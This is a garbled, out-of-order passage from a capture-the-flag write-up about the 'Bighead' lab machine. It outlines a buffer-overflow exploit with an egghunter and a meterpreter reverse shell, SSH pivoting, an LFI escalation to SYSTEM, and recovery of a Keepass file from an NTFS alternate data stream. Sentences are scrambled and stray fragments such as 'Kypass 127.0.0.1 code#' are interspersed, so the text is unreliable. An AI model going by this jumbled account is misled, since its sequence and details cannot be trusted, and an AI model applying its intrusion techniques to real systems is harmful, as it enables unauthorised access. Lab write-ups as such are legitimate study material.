exe file in IDA Free, I saw that the binary was compiled with Mingw. Exploit development (Method #1 using egghunter)Īfter opening the. So, both requests to / and /coffee on are served by that crap custom webserver but only /coffee reveals the server header because of the proxy_pass_header Server config file. Proxy_cache_key $scheme$proxy_host$request_uri$request_method # Backend server to forward requests to/from There’s a single port open and Nginx is listening on it: Open the Keepass database file with the keyfile and password, then recover the root.txt hash from the database.Download the admin.png keyfile, extract the hidden stream, extract the hash from the database file and crack it with John The Ripper.Find that there is an NTFS alternate data stream in the root.txt file that contains the hidden Keepass database file.Notice that Keepass is installed and that the configuration file contains a keyfile name and database file of root.txt.Get the user.txt flag and find that the root.txt is accessible but contains a troll.Find an LFI vulnerability in the Testlink application then use it to get a shell as NT AUTHORITY\SYSTEM.Find the nginx SSH credentials by looking in the registry then log in to bvshell.Find a local SSH service listening on port 2020 then set up port forwarding to reach it.Get a working reverse shell with the exploit and a metepreter payload.Adapt the exploit so it works through the Nginx reverse proxy.Develop a working exploit locally on a 32 bits Windows 7 machine.Analyse the binary and determine that it is vulnerable to a buffer overflow in HEAD requests.
Kypass 127.0.0.1 code#
Search github and find that we can download the source code for the BigheadWebSvr webserver.
Kypass 127.0.0.1 software#
There’s also another way to exploit this software without using an egghunter: We can use the LoadLibrary function to remotely load a. The exploit part is especially tricky since there isn’t a lot of buffer space to work with so I had to put my second stage payload in memory first with a POST request then use an egghunter for the first stage payload. Note to self: Always clean-up my notes after doing a box. It was especially hard going back when doing this writeup and remember about the 418 status code and the registry key for the SSH password. This box took the big part of my weekend when it came out but unfortunately I didn’t keep detailed notes about everything. For the final stretch there is an NTFS alternate data stream with a Keepass file that contains the final flag. After getting a shell, there’s some pivoting involved to access a limited SSH server, then an LFI to finally get a shell as SYSTEM. We then need to exploit a buffer overflow in the HEAD requests by creating a custom exploit. Bighead was an extremely difficult box by 3mrgnc3 that starts with website enumeration to find two sub-domains and determine there is a custom webserver software running behind an Nginx proxy.